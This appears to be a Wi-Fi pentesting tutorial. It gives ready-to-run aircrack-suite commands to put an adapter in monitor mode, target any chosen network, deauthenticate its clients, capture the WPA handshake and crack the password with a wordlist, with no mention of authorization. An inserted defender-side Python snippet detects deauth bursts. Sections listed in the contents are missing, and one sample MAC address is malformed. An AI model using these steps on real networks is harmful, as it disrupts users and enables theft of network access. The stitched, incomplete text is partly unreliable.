- What is Wi-Fi Pentesting? Why is it So Important?
- Requirements
- Recommended Products
- Install Wi-fi Drivers
- Basics
- Scan Local Area WiFi networks.
- Deauthenticate Attack
- Capture Handshake file.
- Crack handshake using aircrack.
- Crack handshake using John/Hashcat.
- Whitelisting MAC
Wireless penetration testing is a part of network penetration testing (NPT). It is a security assessment process focused on identifying vulnerabilities and reviewing the general security configuration of a network. Wireless pentesting is crucial for securing these networks against unauthorized access, data theft, and other cyber threats.
An attacker can easily spoof and view other users' data within the network, perform various attacks to disrupt it, and spread malware such as worms to infect the entire network.
- 2.4 GHz and 5 GHz
- Monitor Mode
- Packet Injection
- Kali
- Parrot
This adapter has a Realtek RTL8821AU chipset. It costs about ₹1,100 or less. It has good range, is well supported by the Linux community, and has drivers for Kali Linux, Parrot OS, etc. The Archer T2U Plus is on sale for under 1000 INR, which is a very affordable price and, in my opinion, a very good choice for beginners in pentesting.
- Amazon
- Flipkart
- AC1300 T3U
If you don't have any budget concerns, you can go for an Alfa Wi-Fi adapter, which costs around 4-10k depending on sales or market prices. They have more range.
- AC1200
- AC1900
```bash
git clone https://github.com/Esther7171/WiFi-Pentesting && cd WiFi-Pentesting && chmod +x install.sh && ./install.sh
```
- This script automatically installs the drivers on Kali, including those for external Wi-Fi adapters.
The first thing to do is to identify your wireless adapter's name on your OS.
- In Kali the default name is `wlan0`. If you have 2 Wi-Fi adapters connected at the same time, the second one will show as `wlan1`.
First you need an adapter that supports monitor mode and packet injection. If you are using the TP-Link T2U Plus, you are ready.
```bash
sudo su
# or
su root
iwconfig
airmon-ng check kill
```
- wlan0 => interface name.
- WIFI@REALTEK => the nickname of wlan0; you can use either, but wlan0 is recommended.
- If you are already connected to Wi-Fi, it sometimes shows wlan1 or wlan2 rather than wlan0 (in case you have 2 adapters, one for Wi-Fi and a second one for testing).
```bash
ifconfig wlan0 down
iwconfig wlan0 mode managed
ifconfig wlan0 up
iwconfig
airmon-ng start wlan0
# airmon-ng usually renames the interface to wlan0mon; use the name it prints
# in the following commands if it differs from wlan0
airodump-ng wlan0
```
- Copy the BSSID of the network you like (BSSID = the MAC address shown in the first column).
- Also note the CH (channel number) of the same router.
- `--bssid` => the network you are going to attack.
- `--channel` => the channel number; `-c` also works, but sometimes it doesn't behave well.
- `--write` => creates the file where the handshake is stored.
```bash
airodump-ng wlan0 --bssid <bssid> --channel <channel> --write /path/Meow.txt
airodump-ng wlan0 --bssid <bssid> -c <channel> -w /path/Meow.txt
airodump-ng wlan0 --bssid 3C:46:45:1D:5D:31 --channel 11 -w /home/death/Meow.txt
```
- aireplay-ng is powerful; we use it to deauthenticate clients and capture the handshake when they try to reconnect.
- `-a` => router MAC address.
- `-c` => the client device connected to the router that we are going to deauthenticate.
- `--deauth` / `-0` => the number of deauth packets to send.
```bash
aireplay-ng wlan0 -a <bssid> -c <station> --deauth 10
aireplay-ng wlan0 -a <bssid> -c <station> -0 <number of packets>
aireplay-ng wlan0 -a 3C:46:45:1D:5D:31 -c D4:36:89:A4:7R:29 --deauth 10
# without -c the deauth is not limited to one station
aireplay-ng wlan0 -a <bssid> -0 <number of packets>
```
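The deauth step above is noisy, and a wireless IDS spots it by the same property a pentester relies on: many deauthentication frames for one BSSID in a very short window. The following is an added defender-side example, not code from this repository: it parses raw 802.11 management frame headers, keeps only deauth frames, and flags a BSSID when a burst lands inside a short window. The MAC addresses, timestamps, and frames are constructed test data.

```python
import struct
from collections import defaultdict
MGMT, DEAUTH = 0, 12   # 802.11 type / subtype of a deauthentication frame

def parse_mgmt_frame(raw: bytes):
    """Parse the 24-byte 802.11 MAC header (frame control, duration, addr1..3,
    sequence control); a deauth body is a 2-byte little-endian reason code."""
    if len(raw) < 24:
        return None
    fc = struct.unpack_from("<H", raw, 0)[0]
    frame = {"type": (fc >> 2) & 0x3, "subtype": (fc >> 4) & 0xF,
             "addr1": raw[4:10].hex(":"),    # receiver
             "addr2": raw[10:16].hex(":"),   # transmitter
             "addr3": raw[16:22].hex(":"),   # BSSID when To-DS/From-DS are 0
             "reason": None}
    if (frame["type"], frame["subtype"]) == (MGMT, DEAUTH) and len(raw) >= 26:
        frame["reason"] = struct.unpack_from("<H", raw, 24)[0]
    return frame

def deauth_bursts(frames, window=2.0, threshold=5):
    """frames: iterable of (timestamp_seconds, raw_frame_bytes). Returns
    {bssid: peak deauth count inside any `window` seconds} for each BSSID whose
    peak reaches `threshold`; a lone deauth (a client leaving) never alerts."""
    stamps = defaultdict(list)
    for ts, raw in frames:
        f = parse_mgmt_frame(raw)
        if f and f["reason"] is not None:        # deauth frames only
            stamps[f["addr3"]].append(ts)
    alerts = {}
    for bssid, times in stamps.items():
        times.sort()
        peak = start = 0
        for end, t in enumerate(times):
            while t - times[start] > window:     # slide the window start forward
                start += 1
            peak = max(peak, end - start + 1)
        if peak >= threshold:
            alerts[bssid] = peak
    return alerts

def make_mgmt(subtype, dst, src, bssid, body=b""):
    """Constructed test frame (not captured traffic): protocol version 0, type 0."""
    macs = b"".join(bytes.fromhex(m.replace(":", "")) for m in (dst, src, bssid))
    return struct.pack("<HH", subtype << 4, 0) + macs + bytes(2) + body

AP_A, AP_B, STA = "02:00:00:00:00:01", "02:00:00:00:00:02", "02:00:00:00:00:10"
SAMPLE_FRAMES = (
    [(0.0, make_mgmt(8, "ff:ff:ff:ff:ff:ff", AP_A, AP_A))]               # beacon, ignored
    + [(1.0, make_mgmt(DEAUTH, STA, AP_A, AP_A, struct.pack("<H", 3)))]  # one normal deauth
    + [(5.0 + i * 0.05, make_mgmt(DEAUTH, STA, AP_B, AP_B, struct.pack("<H", 7)))
       for i in range(10)])                                              # burst against AP_B
```

Running `deauth_bursts(SAMPLE_FRAMES)` reports only AP_B, with its peak of 10 frames; a real monitor would feed it frames read from the monitor-mode interface instead of the constructed list.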
- The .cap file is the captured handshake. In my case it is Meow.txt.cap.
- So we are going to crack it with aircrack-ng and a wordlist.
- `-w` gives the wordlist.
- You get many files, but we need the .cap file where the handshake is stored.
- If no handshake was captured, deauth another device.
- `gzip -d /usr/share/wordlists/rockyou.txt.gz` (if the wordlist is not already extracted)
```bash
aircrack-ng Meow.txt.cap -w /usr/share/wordlists/rockyou.txt
```
- When it cracks the handshake, it shows the password.